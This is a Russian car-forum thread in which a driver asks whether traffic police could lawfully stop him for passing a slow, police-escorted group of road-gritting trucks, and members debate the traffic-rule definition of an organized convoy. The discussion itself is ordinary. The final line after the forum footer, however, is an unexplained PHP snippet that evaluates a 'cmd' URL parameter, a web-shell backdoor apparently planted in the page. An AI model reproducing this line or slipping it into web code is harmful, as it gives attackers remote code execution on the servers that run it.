+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 16

Тема: Опережение толпы спецтехники


  1. #1
    GTI-Racing dimitryst will become famous soon enough Аватар для dimitryst
    Регистрация
    13.09.2011
    Откуда
    МСК
    Машина
    Разноцветное такси
    Сообщений
    1,052

    Опережение толпы спецтехники

    Схлестнулся я тут на выходных ночью с гаишниками, интересно насколько кто был прав и как бороться в будущем...

    В общем, ехала куча посыпательно-разбрызгивающих машин по ТТК, штук 20 наверно, их сзади прикрывала машина дпс, все это со скоростью километров 25-30.
    Я ментосов попытался нахрапом обогнать, на что они меня тормознули и нахрапом взяли уже меня))
    В общем, они возмутились, что я пытаюсь обогнать колонну, ну и посоветовали освежить в памяти правила. Поскольку на ходу в правила заглянуть я не мог, пришлось затихнуть и ползти в грязюке.
    Чтож, я освежил и не нашел ни единого пункта, позволяющего им блокировать движение на 6-ти полосной дороге и не позволяющего мне забить на них болт, т.к. это была не колонна (они не в одну полосу двигались) и я их не обгонял (а опережал).

    Вопрос - кто с таким сталкивался и как боролись?

    Видео позже выложу.

    Добавлено через 27 минут
    Оказалось, 2 раза в сердцах назвал их козлами, но получается, что не в лицо. Жалею...


    Экшн только первые пару минут, потом долго тащился за брызгалкой(
    Последний раз редактировалось dimitryst; 10.12.2012 в 12:42. Причина: Добавлено сообщение

  2. #2
    в любую юридическую контору обратись , первый прием бесплатный всегда или напиши им и задай вопрос

  3. #3
    GTI-Racing dimitryst will become famous soon enough Аватар для dimitryst
    Регистрация
    13.09.2011
    Откуда
    МСК
    Машина
    Разноцветное такси
    Сообщений
    1,052
    Цитата Сообщение от Alexandr 922 Посмотреть сообщение
    в любую юридическую контору обратись , первый прием бесплатный всегда или напиши им и задай вопрос
    Юристы - это если бы меня уже наказывали, а сейчас больше интересен опыт

  4. #4
    GTI-Racing Окислитель is on a distinguished road Аватар для Окислитель
    Регистрация
    16.04.2008
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    847
    Под 12.15.1 это попадает.

    Из опыта, не сталкивался, т.к. не нарушаю и соответственно не боролся.
    Оборудование и инструмент в том числе для ремонта любимого VW.

  5. #5
    GTI-Racing eXtreeM will become famous soon enough eXtreeM will become famous soon enough Аватар для eXtreeM
    Регистрация
    12.08.2007
    Откуда
    Москва (почти)
    Машина
    GTI 6 WhiteCandy DSG 4motion
    Сообщений
    570
    Цитата Сообщение от Окислитель Посмотреть сообщение
    Под 12.15.1 это попадает.

    Из опыта, не сталкивался, т.к. не нарушаю и соответственно не боролся.
    Не попадает. Там не организованная колонна.

  6. #6
    Авто Года 2010 Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Аватар для Чуйкин
    Регистрация
    12.04.2006
    Откуда
    Москвабад
    Машина
    Golf 1.8t 460лс 520Нм
    Сообщений
    2,543
    http://vk.com/auto_pravo здесь знают

  7. #7
    GTI-Racing Окислитель is on a distinguished road Аватар для Окислитель
    Регистрация
    16.04.2008
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    847
    Цитата Сообщение от eXtreeM Посмотреть сообщение
    Не попадает. Там не организованная колонна.
    Оспорить по несоответствию только паре слов " по одной и той же полосе движения" вряд ли получилось бы.
    Оборудование и инструмент в том числе для ремонта любимого VW.

  8. #8
    GTI-Racing eXtreeM will become famous soon enough eXtreeM will become famous soon enough Аватар для eXtreeM
    Регистрация
    12.08.2007
    Откуда
    Москва (почти)
    Машина
    GTI 6 WhiteCandy DSG 4motion
    Сообщений
    570
    Цитата Сообщение от Окислитель Посмотреть сообщение
    Оспорить по несоответствию только паре слов " по одной и той же полосе движения" вряд ли получилось бы.
    Бредовая страна.

  9. #9
    GTI-Racing Grisha is a jewel in the rough Grisha is a jewel in the rough Grisha is a jewel in the rough Аватар для Grisha
    Регистрация
    03.04.2007
    Откуда
    ЗЕЛАО
    Машина
    MKV R32
    Сообщений
    1,576
    Организованная транспортная колонна - группа из трех и более механических транспортных средств, следующих непосредственно друг за другом по одной и той же полосе движения с постоянно включенными фарами в сопровождении головного транспортного средства с нанесенными на наружные поверхности специальными цветографическими схемами и включенными проблесковыми маячками синего и красного цветов.

    Согласно ПДД, любым транспортным средствам, не относящимся к организованной колонне, запрещается пересекать её или занимать место в ней при обгоне (то есть обгонять можно только всю колонну, не создавая помех ее участникам). Поэтому первостепенная задача водителя - распознать такую колонну. Сделать это нетрудно.

    Организованная транспортная колонна:
    - включает в себя не менее трех транспортных средств;
    - во главе её движется транспортное средство с включенными проблесковыми маячками синего и красного цветов и нанесенными на боковые поверхности специальными цветографическими схемами.

    На всех транспортных средствах в составе организованной транспортной колонны независимо от времени суток должен быть включен ближний свет фар.

    Примечание: при отсутствии какого-либо из вышеперечисленных признаков группа транспортных средств не считается организованной транспортной колонной.

  10. #10
    Авто Года 2010 Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Аватар для Чуйкин
    Регистрация
    12.04.2006
    Откуда
    Москвабад
    Машина
    Golf 1.8t 460лс 520Нм
    Сообщений
    2,543
    а это видео видели? в итоге чела на девятке лишили прав.... у нас тоже самое твориться.. Слава пУКИНУ и пРоБяНу))

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Ответов: 3
    Последнее сообщение: 09.12.2023, 18:22

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}